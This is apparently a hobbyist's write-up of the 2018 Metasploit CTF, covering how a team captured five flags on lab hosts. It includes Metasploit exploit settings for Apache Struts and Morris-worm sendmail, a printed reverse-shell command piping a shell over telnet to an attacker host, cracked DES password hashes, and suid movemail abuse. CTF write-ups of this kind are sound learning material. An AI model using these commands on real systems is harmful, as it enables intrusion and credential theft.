Metaspoit CTF 2018 Writeup

So just recently, I participated in the 2018 Metasploit CTF. I got some flags,
created some shells with my team, and had some fun. It ranged from being difficult in certain challenges and some being really straightforward. We ended up getting about 5 flags (I know, not a whole lot but this was my first time participating in a CTF like this) and I feel very accomplished of myself and my team on how much we did. I defenetly will be doing this CTF next year as it’s a very good one, and I learned a lot with it. The following methods used to acquire the flags below were in collaboration with the team (B0rn2r00t, jetson23, Nukez, T, and fir, thank you guys) and is not solely my work. All credit goes to everyone involved in the CTF team.

Configuration

The CTF was organized in a very interesting way. There are three boxes in total, two were targets (one being a Windows interface and one being a Linux interface) and to be able to attack these targets, you had to access them through a Kali Linux box that was provided to you through a given IP. Once connected to this box we can then go ahead and attack the targets through the terminal given. (Although I did not realize this until after the competition, you could configure proxychains in the Kali box to be able to use tools outside of the box instead of being limited to the provided CLI and tools.)

3 of Clubs

The three of clubs was a very simple challenge. This one could be found by simply reading the entire rules on the CTF site. Once you do, you will find a line that will look like this

Rules

Upon looking at this, it tells us to go to a website on the Linux machine hosted on port 31063. We can access this through a terminal program known as links.

1
links http://172.16.28.38:31063

Once the page loads up, we are immediately asked how to describe the reward we are seeking in one word in a text field below. If we read the rules, it mentions a splendiferous reward that is to be found on this server. If we take a look at the source, it takes what we input into the field, adds .png at the end of it and treats it as a URL.

Therefore, we can just use a simple wget request to get our flag

1
wget http://172.16.28.38:31063/splendiferous.png

And the three of clubs is now ours!

ThreeOfClubs

10 of Hearts

From here, we decided to run a port scan on the Ubuntu machine. We tried the windows machine but we were unable to get any flags from it, so there won’t be any information about it here. The following was the output of the scan

1
2
3
4
5
6
7
8
9
10
11
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-01 08:16 UTC
Nmap scan report for 172.16.28.37
Host is up (0.0046s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
25/tcp open smtp
79/tcp open finger
2222/tcp open EtherNetIP-1
8080/tcp open http-proxy
8181/tcp open intermapper
8443/tcp open https-alt

Reading this, we can see that there is an http service running on port 8080, after further analysis, it appears to be an Apache Struts instance.

1
2
3
4
8080/tcp open  http-proxy
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Struts2 Showcase
|_Requested resource was showcase.action

Through further analysis, we figured out that the version of the Struts instance is running 2.3.x and thankfully, there is an exploit available on Metasploit. The module’s name is exploit/multi/http/struts2_code_exec_showcase. We proceeded to exploit it and used the payload cmd/unix/reverse_bash.

The options we used are below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Module options (exploit/multi/http/struts2_code_exec_showcase):

Name Current Setting Required Description
---- --------------- -------- -----------
POSTPARAM name yes The HTTP POST parameter
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.28.37 yes The target address range or CIDR identifier
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /integration/saveGangster.action yes The path to a struts application action
VHOST no HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.28.36 yes The listen address (an interface may be specified)
LPORT 9010 yes The listen port


Exploit target:

Id Name
-- ----
0 Universal

We happened to get a shell with this, but now we must hunt down for the flag. Luckily, we were able to find it in the directory /usr/local/tomcat/tmp. Upon looking in here we were able to find the 10 of hearts.

1
2
3
4
5
6
cd /usr/local/tomcat/tmp
ls -al
total 328
drwxr-xr-x 2 root root 4096 Nov 26 20:43 .
drwxr-xr-x 19 root root 4096 Dec 1 06:01 ..
-rwxr--r-- 1 root root 326794 Nov 26 20:42 10_of_hearts

TenOfHearts

2 of Diamonds

This flag was a difficult one, as it involved a lot of different things to be done to get the flag. When we did our Nmap scan we noticed port 25 was open and running an SMTP server. We decided to see if we can find an open relay on the server, and sure enough, there was.

1
2
3
4
5
6
7
8
9
10
11
msf5 auxiliary(scanner/smtp/smtp_relay) > exploit 

[+] 172.16.28.37:25 - SMTP 220 2-of-diamonds Sendmail 5.51/5.17 ready at Mon, 1 Dec 86 03:02:45 PST\x0d\x0a
[*] 172.16.28.37:25 - "500 Command unrecognized\r\n"
[*] 172.16.28.37:25 - "250 <sender@example.com>... Sender ok\r\n"
[*] 172.16.28.37:25 - "250 <target@example.com>... Recipient ok\r\n"
[*] 172.16.28.37:25 - "354 Enter mail, end with \".\" on a line by itself\r\n"
[*] 172.16.28.37:25 - "250 Ok\r\n"
[+] 172.16.28.37:25 - Potential open SMTP relay detected: - MAIL FROM:<sender@example.com> -> RCPT TO:<target@example.com>
[*] 172.16.28.37:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Using another module, we also found out that the SMTP server was a Sendmail 5.51/5.17 server. Just like the 10 of hearts, there is an exploit for this specific version. We then searched for anything related to sendmail and got these results.

1
2
3
4
5
6
7
8
9
10
11
12
Matching Modules
================

Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/dos/smtp/sendmail_prescan 2003-09-17 normal No Sendmail SMTP Address prescan Memory Corruption
exploit/linux/misc/hplip_hpssd_exec 2007-10-04 excellent No HPLIP hpssd.py From Address Arbitrary Command Execution
exploit/multi/http/phpmailer_arg_injection 2016-12-26 manual No PHPMailer Sendmail Argument Injection
exploit/solaris/lpd/sendmail_exec 2001-08-31 excellent No Solaris LPD Command Execution
exploit/unix/smtp/clamav_milter_blackhole 2007-08-24 excellent No ClamAV Milter Blackhole-Mode Remote Code Execution
exploit/unix/smtp/morris_sendmail_debug 1988-11-02 average Yes Morris Worm sendmail Debug Mode Shell Escape
post/linux/gather/enum_configs normal No Linux Gather Configurations

There is one big detail that helped us in determining which exploit to use. Seeing the timestamp from the earlier relay scan, it mentions that it was ready at December 1, 1986, which when we look at the disclosure dates next to the modules, we can see that in 1988-11-02 the Morris Worm was disclosed. We decided to go with this module along with the cmd/unix/reverse payload. Thankfully we were successful.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 exploit(unix/smtp/morris_sendmail_debug) > exploit 

[*] Started reverse TCP double handler on 172.16.28.36:4444
[*] 172.16.28.37:25 - Connecting to sendmail
[*] 172.16.28.37:25 - Enabling debug mode and sending exploit
[*] 172.16.28.37:25 - Sending: DEBUG
[*] 172.16.28.37:25 - Sending: MAIL FROM:<Br3XVjJuaJpXYManvhOxBXuwv>
[*] 172.16.28.37:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
[*] 172.16.28.37:25 - Sending: DATA
[*] 172.16.28.37:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc
[*] 172.16.28.37:25 - Sending: export PATH
[*] 172.16.28.37:25 - Sending: sh -c '(sleep 3655|telnet 172.16.28.36 4444|while : ; do sh && break; done 2>&1|telnet 172.16.28.36 4444 >/dev/null 2>&1 &)'
[*] 172.16.28.37:25 - Sending: .
[*] 172.16.28.37:25 - Sending: QUIT
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oq9MvZlFwNKDbXzN;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (172.16.28.36:4444 -> 172.16.28.37:48210) at 2018-12-01 11:06:29 +0000

We don’t seem to be root in the system, so let us go ahead and see if we can get some password hashes. Using cat /etc/passwd we manage to get some password hashes, and we are done with our shell. We put the hashes into hash-identifier and it tells us that it is using the DES hash algorithm. Using hashcat with the rockyou wordlist, we were able to crack the hashes.

1
2
3
4
5
6
7
8
9
10
11
12
ec2-user@kali:~/ubuntu$ hashcat -m 1500 hashes --wordlist /usr/share/wordlists/rockyou.txt --force 

FA/4weg1/wy2c:biteme ghg
OciUqGHcs9YOw:fatcat tef
s.EZm/wQTqbro:whocares ralph
NYqgD2jjeuozk:hacker Shannon
hnZ1ZK5H2qapE:lancelot miriam
uxxJaRZvgyiPg:fun rich
6l7zMyp8dZLZU:foobar ckusick
Yd6H6R7ejeIP2:raygun sam
.6s.pzMqjyMrU:haring jim
STpwu/Ggmk78A:noexit van

We now can login with these credentials, but we are not able to access a certain folder, namely /etc/guest/hunter. When we ran his hash in hashcat, it wasn’t successful with the rockyou wordlist, so we had to do a brute-force attack.

1
2
3
hashcat -m 1500 IE4EHKRqf6Wvo -a 3 ?1?1?1?1?1?1?1 -i --increment-min=6 --force

IE4EHKRqf6Wvo:msfhack hunter

Thankfully, it was successful and we find the password to be msfhack. Using this we switch to hunter to access his folder. Upon access, we find the movemail program is in there which also happens to have a suid of root, allowing us to copy any file in the system. Using this we copied over the 2 of Diamonds.

1
movemail /usr/games/lib/2_of_diamonds.dat /usr/guest/2_of_diamonds.dat

Unfortunately, it’s encrypted and unreadable but while poking around, we found an adventure file. Of course, we copied it over.

1
movemail /usr/games/adventure /usr/hunter/adventure

We made the adventure file executable and ran it. I will spare the details since it takes a while but once you complete it, you will get a password to decrypt the 2 of Diamonds.

TwoOfDiamonds

5 of Spades

To get the 5 of Spades, you simply needed to poke around in Metasploit a bit. Once we did, we found a very interesting module called exploit/multi/ctf/flag. Using it outputs this:

1
5_of_spades is at http://host-ip:9021/0.png

All we have to do is initiate a wget request, and the flag is ours.

FiveofSpades

8 of Diamonds

To find the 8 of diamonds, we must look at a service running on port 8181. Upon further investigation, it seems to be running an http server. Using wget, we can download the webpage and analyze it locally on the console.

1
wget http://172.16.28.37:8181/ -o page.html

Upon investigation of the html site, there seems to be some JS code found in the file. Upon further analysis, it seems to be obfuscated under IlluminateJS. We can easily use https://illuminatejs.com/ and paste the obfuscated code into the site to be decrypted.

Once we do, it outputs some ciphertext encoded in base64. All we have to do is copy this into a text file and decrypt it

1
base64 -d flag.txt flag

Once we do, it outputs a png file which just so happens to be our flag!

8 of Diamonds

Again, this CTF was very interesting and educating to both me and my team. I would like to thank my teammates and Rapid7 for this CTF. Without them, I could not do most of the things in this CTF. I hope and expect to do this again next year.

Until then…